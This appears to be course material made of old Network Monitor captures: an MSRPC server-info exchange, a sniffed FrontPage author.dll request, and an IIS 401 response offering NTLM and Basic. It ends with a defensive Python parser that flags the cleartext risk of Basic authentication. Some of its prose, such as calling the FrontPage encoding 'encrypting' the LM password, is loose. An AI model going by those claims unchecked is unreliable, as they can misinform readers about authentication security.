MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation
MSRPC: Fragment Length = 116 (0x74)
MSRPC: Authentication Length = 0 (0x0)
MSRPC: Call Identifier = 1 (0x1)
MSRPC: Bind Frame Number = 25 (0x19)
MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
MSRPC: Allocation Hint = 92 (0x5C)
MSRPC: Presentation Context Identifier = 0 (0x0)
MSRPC: Cancel Count = 0 (0x0)
MSRPC: Reserved = 0 (0x0)
MSRPC: Stub Data
R_SRVSVC: RPC Server response srvsvc:NetrServerGetInfo(..)
R_SRVSVC: LPSERVER_INFO InfoStruct {..}
R_SRVSVC: Switch Value = 101 (0x65)
R_SRVSVC: LPSERVER_INFO_101 ServerInfo101 {..}
R_SRVSVC: DWORD sv101_platform_id = 500 (0x1F4)
R_SRVSVC: LPTSTR sv101_name = 1363784 (0x14CF48)
R_SRVSVC: DWORD sv101_version_major = 4 (0x4)
R_SRVSVC: DWORD sv101_version_minor = 0 (0x0)
R_SRVSVC: DWORD sv101_type = 266251 (0x4100B)
R_SRVSVC: LPTSTR sv101_comment = 1363812 (0x14CF64)
R_SRVSVC: LPTSTR sv101_name = 204.73.131.11
R_SRVSVC: LPTSTR sv101_comment =
R_SRVSVC: Return Value = 0 (0x0)

00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 9D 08 00 45 00  ..O.....O.....E.
00010: 00 D8 3C 0E 40 00 80 06 1F 60 CC 49 83 0B CC 49  ..<.@....`.I...I
00020: 83 13 00 8B 07 28 00 16 FB 1A 04 60 25 6F 50 18  .....(.....`%oP.
00030: 1C 92 7C 1E 00 00 00 00 00 AC FF 53 4D 42 25 00  ..|........SMB%.
00040: 00 00 00 98 03 80 24 82 00 00 00 00 00 00 00 00  ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 01 0A 00 00 74 00 00  .....|.......t..
00060: 00 00 00 38 00 00 00 74 00 38 00 00 00 00 00 75  ...8...t.8.....u
00070: 00 48 05 00 02 03 10 00 00 00 74 00 00 00 01 00  .H........t.....
00080: 00 00 5C 00 00 00 00 00 00 00 65 00 00 00 30 CF  ..\.......e...0.
00090: 14 00 F4 01 00 00 48 CF 14 00 04 00 00 00 00 00  ......H.........
000A0: 00 00 0B 10 04 00 64 CF 14 00 0E 00 00 00 00 00  ......d.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00  ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00  3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00  ................
000E0: 16 00 00 00 00 00                                ......

Frontpage Sniff:

Below you can see the NTLM authentication process, and that an application called X-vermeer-urlencoded is the utility that is encrypting our LM password. The IIS option "Windows NT Challenge/Response" is turned on in the following example.
21  30.856  00C04FC48C8F  STUDENT7  HTTP  POST Request (from client using port 1140)  204.73.131.18  STUDENT7  IP

FRAME: Base frame properties
FRAME: Time of capture = Dec 1, 1997 17:56:55.389
FRAME: Time delta from previous physical frame: 2 milliseconds
FRAME: Frame number: 21
FRAME: Total frame length: 433 bytes
FRAME: Capture frame length: 433 bytes
FRAME: Frame data: Number of data bytes remaining = 433 (0x01B1)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C93
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C8F
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 433 (0x01B1)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 419 (0x01A3)
IP: ID = 0xB805; Proto = TCP; Len: 419
IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14)
IP: Service Type = 0 (0x0)
IP: Precedence = Routine
IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability
IP: Total Length = 419 (0x1A3)
IP: Identification = 47109 (0xB805)
IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes
IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control
IP: Checksum = 0xA296
IP: Source Address = 204.73.131.18
IP: Destination Address = 204.73.131.19
IP: Data: Number of data bytes remaining = 399 (0x018F)
TCP: .AP..., len: 379, seq: 705525-705903, ack: 4115388, win: 8760, src: 1140 dst: 80
TCP: Source Port = 0x0474
TCP: Destination Port = Hypertext Transfer Protocol
TCP: Sequence Number = 705525 (0xAC3F5)
TCP: Acknowledgement Number = 4115388 (0x3ECBBC)
TCP: Data Offset = 20 (0x14)
TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP...
TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function
TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize
TCP: .......0 = No Fin
TCP: Window = 8760 (0x2238)
TCP: Checksum = 0xA8FF
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 379 (0x017B)
HTTP: POST Request (from client using port 1140)
HTTP: Request Method = POST
HTTP: Uniform Resource Identifier = /_vti_bin/_vti_aut/author.dll
HTTP: Protocol Version = HTTP/1.0
HTTP: Date = Mon, 01 Dec 1997 23:57:10 GMT
HTTP: MIME-Version = 1.0
HTTP: User-Agent = MSFrontPage/3.0
HTTP: Host = 204.73.131.19
HTTP: Accept = auth/sicily
HTTP: Content-Length = 62
HTTP: Content-Encoding = x-vermeer-1
HTTP: Content-Type = application/x-vermeer-rpc
HTTP: Undocumented Header = X-Vermeer-Content-Type: application/x-vermeer-rpc
HTTP: Undocumented Header Fieldname = X-Vermeer-Content-Type
HTTP: Undocumented Header Value = application/x-vermeer-rpc
HTTP: Data: Number of data bytes remaining = 62 (0x003E)

00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 8F 08 00 45 00  ..O.....O.....E.
00010: 01 A3 B8 05 40 00 80 06 A2 96 CC 49 83 12 CC 49  ....@......I...I
00020: 83 13 04 74 00 50 00 0A C3 F5 00 3E CB BC 50 18  ...t.P.....>..P.
00030: 22 38 A8 FF 00 00 50 4F 53 54 20 2F 5F 76 74 69  "8....POST /_vti
00040: 5F 62 69 6E 2F 5F 76 74 69 5F 61 75 74 2F 61 75  _bin/_vti_aut/au
00050: 74 68 6F 72 2E 64 6C 6C 20 48 54 54 50 2F 31 2E  thor.dll HTTP/1.
00060: 30 0D 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 30 31  0..Date: Mon, 01
00070: 20 44 65 63 20 31 39 39 37 20 32 33 3A 35 37 3A   Dec 1997 23:57:
00080: 31 30 20 47 4D 54 0D 0A 4D 49 4D 45 2D 56 65 72  10 GMT..MIME-Ver
00090: 73 69 6F 6E 3A 20 31 2E 30 0D 0A 55 73 65 72 2D  sion: 1.0..User-
000A0: 41 67 65 6E 74 3A 20 4D 53 46 72 6F 6E 74 50 61  Agent: MSFrontPa
000B0: 67 65 2F 33 2E 30 0D 0A 48 6F 73 74 3A 20 32 30  ge/3.0..Host: 20
000C0: 34 2E 37 33 2E 31 33 31 2E 31 39 0D 0A 41 63 63  4.73.131.19..Acc
000D0: 65 70 74 3A 20 61 75 74 68 2F 73 69 63 69 6C 79  ept: auth/sicily
000E0: 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68  ..Content-Length
000F0: 3A 20 36 32 0D 0A 43 6F 6E 74 65 6E 74 2D 45 6E  : 62..Content-En
00100: 63 6F 64 69 6E 67 3A 20 78 2D 76 65 72 6D 65 65  coding: x-vermee
00110: 72 2D 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70  r-1..Content-Typ
00120: 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78  e: application/x
00130: 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D 0A 58 2D  -vermeer-rpc..X-
00140: 56 65 72 6D 65 65 72 2D 43 6F 6E 74 65 6E 74 2D  Vermeer-Content-
00150: 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F  Type: applicatio
00160: 6E 2F 78 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D  n/x-vermeer-rpc.
00170: 0A 0D 0A B0 32 7D ED 9D 1C A9 A8 B3 BB BC 12 39  ....2}.........9
00180: 84 F7 B3 9C 83 A4 CF 39 B7 B4 BC 23 05 A7 41 79  .......9...#..Ay
00190: 05 F8 45 78 01 FA 41 50 01 F8 47 D4 07 55 7D E3  ..Ex..AP..G..U}.
001A0: F8 C2 9F 0F B4 BC 23 B9 A9 F9 F7 FC A4 1B 79 28  ......#.......y(
001B0: B1                                               .
If Windows NT Challenge/Response Security is enabled on the Web Server, each initial request to download a file, after establishing a TCP session, is responded to with an accesss denied HTTP frame: 23 30.859 STUDENT7 00C04FC48C8F HTTP Response (to client using port 1140) STUDENT7 204.73.131.18 IP FRAME: Base frame properties FRAME: Time of capture = Dec 1, 1997 17:56:55.392 FRAME: Time delta from previous physical frame: 0 milliseconds FRAME: Frame number: 23 FRAME: Total frame length: 224 bytes FRAME: Capture frame length: 224 bytes FRAME: Frame data: Number of data bytes remaining = 224 (0x00E0) ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol ETHERNET: Destination address : 00C04FC48C8F ETHERNET: .......0 = Individual address ETHERNET: ......0. = Universally administered address ETHERNET: Source address : 00C04FC48C93 ETHERNET: .......0 = No routing information present ETHERNET: ......0. = Universally administered address ETHERNET: Frame Length : 224 (0x00E0) ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol) ETHERNET: Ethernet Data: Number of data bytes remaining = 210 (0x00D2) IP: ID = 0xC126; Proto = TCP; Len: 210 IP: Version = 4 (0x4) IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0) IP: Precedence = Routine IP: ...0.... = Normal Delay IP: ....0... = Normal Throughput IP: .....0.. = Normal Reliability IP: Total Length = 210 (0xD2) IP: Identification = 49446 (0xC126) IP: Flags Summary = 2 (0x2) IP: .......0 = Last fragment in datagram IP: ......1. 
= Cannot fragment datagram IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80) IP: Protocol = TCP - Transmission Control IP: Checksum = 0x9A46 IP: Source Address = 204.73.131.19 IP: Destination Address = 204.73.131.18 IP: Data: Number of data bytes remaining = 190 (0x00BE) TCP: .AP..., len: 170, seq: 4115388-4115557, ack: 705904, win: 8381, src: 80 dst: 1140 TCP: Source Port = Hypertext Transfer Protocol TCP: Destination Port = 0x0474 TCP: Sequence Number = 4115388 (0x3ECBBC) TCP: Acknowledgement Number = 705904 (0xAC570) TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000) TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data TCP: ...1.... = Acknowledgement field significant TCP: ....1... = Push function TCP: .....0.. = No Reset TCP: ......0. = No Synchronize TCP: .......0 = No Fin TCP: Window = 8381 (0x20BD) TCP: Checksum = 0xD958 TCP: Urgent Pointer = 0 (0x0) TCP: Data: Number of data bytes remaining = 170 (0x00AA) HTTP: Response (to client using port 1140) HTTP: Protocol Version = HTTP/1.0 HTTP: Status Code = Unauthorized HTTP: Reason = Access Denied HTTP: WWW-Authenticate = NTLM HTTP: WWW-Authenticate = Basic realm="204.73.131.19" HTTP: Content-Length = 24 HTTP: Content-Type = text/html HTTP: Data: Number of data bytes remaining = 24 (0x0018) 00000: 00 C0 4F C4 8C 8F 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E. 00010: 00 D2 C1 26 40 00 80 06 9A 46 CC 49 83 13 CC 49 ...&@....F.I...I 00020: 83 12 00 50 04 74 00 3E CB BC 00 0A C5 70 50 18 ...P.t.>.....pP. 00030: 20 BD D9 58 00 00 48 54 54 50 2F 31 2E 30 20 34 ..X..HTTP/1.0 4 00040: 30 31 20 41 63 63 65 73 73 20 44 65 6E 69 65 64 01 Access Denied 00050: 0D 0A 57 57 57 2D 41 75 74 68 65 6E 74 69 63 61 ..WWW-Authentica 00060: 74 65 3A 20 4E 54 4C 4D 0D 0A 57 57 57 2D 41 75 te: NTLM..WWW-Au 00070: 74 68 65 6E 74 69 63 61 74 65 3A 20 42 61 73 69 thenticate: Basi 00080: 63 20 72 65 61 6C 6D 3D 22 32 30 34 2E 37 33 2E c realm="204.73. 
00090: 31 33 31 2E 31 39 22 0D 0A 43 6F 6E 74 65 6E 74 131.19"..Content 000A0: 2D 4C 65 6E 67 74 68 3A 20 32 34 0D 0A 43 6F 6E -Length: 24..Con 000B0: 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F tent-Type: text/ 000C0: 68 74 6D 6C 0D 0A 0D 0A 45 72 72 6F 72 3A 20 41 html....Error: A 000D0: 63 63 65 73 73 20 69 73 20 44 65 6E 69 65 64 2E ccess is Denied.
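The 401 frame above, as an added example that is not part of the original text: a Python 3 script (standard library only) that rebuilds the frame bytes from the Network Monitor hex dump, strips the Ethernet, IPv4 and TCP headers, and reads the WWW-Authenticate challenges. The point a defender should take from this capture is the second challenge: next to NTLM the server also offers Basic, so any client that does not negotiate NTLM sends the domain credential as base64 over plain HTTP. The hex dump embedded in the script is copied from the capture above; the header-stripping, challenge-parsing and risk-flagging logic is my own and is not IIS or FrontPage code.

```python
import re
from typing import Dict, List, Tuple

# Constructed input: the NetMon hex dump of frame 23 (the HTTP 401 response), copied
# from the capture. Offsets and byte values are the capture's own; only the script is new.
NETMON_DUMP_401 = """\
00000: 00 C0 4F C4 8C 8F 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E.
00010: 00 D2 C1 26 40 00 80 06 9A 46 CC 49 83 13 CC 49 ...&@....F.I...I
00020: 83 12 00 50 04 74 00 3E CB BC 00 0A C5 70 50 18 ...P.t.>.....pP.
00030: 20 BD D9 58 00 00 48 54 54 50 2F 31 2E 30 20 34  ..X..HTTP/1.0 4
00040: 30 31 20 41 63 63 65 73 73 20 44 65 6E 69 65 64 01 Access Denied
00050: 0D 0A 57 57 57 2D 41 75 74 68 65 6E 74 69 63 61 ..WWW-Authentica
00060: 74 65 3A 20 4E 54 4C 4D 0D 0A 57 57 57 2D 41 75 te: NTLM..WWW-Au
00070: 74 68 65 6E 74 69 63 61 74 65 3A 20 42 61 73 69 thenticate: Basi
00080: 63 20 72 65 61 6C 6D 3D 22 32 30 34 2E 37 33 2E c realm="204.73.
00090: 31 33 31 2E 31 39 22 0D 0A 43 6F 6E 74 65 6E 74 131.19"..Content
000A0: 2D 4C 65 6E 67 74 68 3A 20 32 34 0D 0A 43 6F 6E -Length: 24..Con
000B0: 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F tent-Type: text/
000C0: 68 74 6D 6C 0D 0A 0D 0A 45 72 72 6F 72 3A 20 41 html....Error: A
000D0: 63 63 65 73 73 20 69 73 20 44 65 6E 69 65 64 2E ccess is Denied.
"""

_DUMP_LINE = re.compile(r"^([0-9A-Fa-f]{5}):\s+(.*)$")
_HEX_BYTE = re.compile(r"[0-9A-Fa-f]{2}")


def parse_netmon_hexdump(dump: str) -> bytes:
    """Rebuild raw frame bytes from NetMon 'OFFSET: xx xx ... ascii' lines.

    The ASCII column can itself look like hex ("01 Access Denied"), so each line's
    byte count is taken from the distance to the next line's offset. Only the last
    line is read greedily (hex tokens until the first non-hex token, at most 16).
    """
    rows: List[Tuple[int, List[str]]] = []
    for line in dump.splitlines():
        m = _DUMP_LINE.match(line.strip())
        if m:
            rows.append((int(m.group(1), 16), m.group(2).split()))
    out = bytearray()
    for i, (offset, tokens) in enumerate(rows):
        if offset != len(out):
            raise ValueError(f"dump is not contiguous at offset {offset:#x}")
        if i + 1 < len(rows):
            count = rows[i + 1][0] - offset
        else:
            count = 0
            while count < min(16, len(tokens)) and _HEX_BYTE.fullmatch(tokens[count]):
                count += 1
        if count > len(tokens) or not all(_HEX_BYTE.fullmatch(t) for t in tokens[:count]):
            raise ValueError(f"bad hex run at offset {offset:#x}")
        out += bytes(int(t, 16) for t in tokens[:count])
    return bytes(out)


def tcp_payload(frame: bytes) -> bytes:
    """Strip Ethernet II (14 bytes), IPv4 (length from IHL) and TCP (data offset) headers."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ip = 14
    ihl = (frame[ip] & 0x0F) * 4
    if frame[ip + 9] != 6:
        raise ValueError("not TCP")
    total_len = int.from_bytes(frame[ip + 2:ip + 4], "big")
    tcp = ip + ihl
    doff = (frame[tcp + 12] >> 4) * 4
    return frame[tcp + doff:ip + total_len]  # ignore any Ethernet trailer


def parse_http_response(payload: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Split status line, (lower-cased name, value) headers and body; repeated headers are kept."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')


def www_authenticate_challenges(headers: List[Tuple[str, str]]) -> List[Tuple[str, Dict[str, str]]]:
    """Return [(scheme, {param: value})] for every WWW-Authenticate header, in server order."""
    challenges = []
    for name, value in headers:
        if name != "www-authenticate":
            continue
        scheme, _, rest = value.partition(" ")
        params = {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
                  for m in _PARAM.finditer(rest)}
        challenges.append((scheme, params))
    return challenges


def assess_401(frame: bytes, over_tls: bool = False) -> Dict[str, object]:
    """Defender's summary: which schemes the server offers and whether Basic is reachable in clear."""
    status, headers, body = parse_http_response(tcp_payload(frame))
    challenges = www_authenticate_challenges(headers)
    basic_realms = [p.get("realm") for s, p in challenges if s.lower() == "basic"]
    declared = dict(headers).get("content-length")
    return {
        "status": status,
        "schemes": [s for s, _ in challenges],
        "basic_realm": basic_realms[0] if basic_realms else None,
        # Basic carries base64(user:password); without TLS the credential is readable on the wire
        "cleartext_basic_risk": bool(basic_realms) and not over_tls,
        "content_length_matches": declared is not None and int(declared) == len(body),
        "body": body.decode("latin-1"),
    }


if __name__ == "__main__":
    for key, val in assess_401(parse_netmon_hexdump(NETMON_DUMP_401)).items():
        print(f"{key}: {val}")
```

Running it on the embedded frame reports schemes `['NTLM', 'Basic']`, the realm `204.73.131.19` and `cleartext_basic_risk: True`; pass `over_tls=True` to model the same server behind HTTPS and the flag clears. The same hex-dump parser can be pointed at the POST frame earlier in this section to recover the `x-vermeer-rpc` request body.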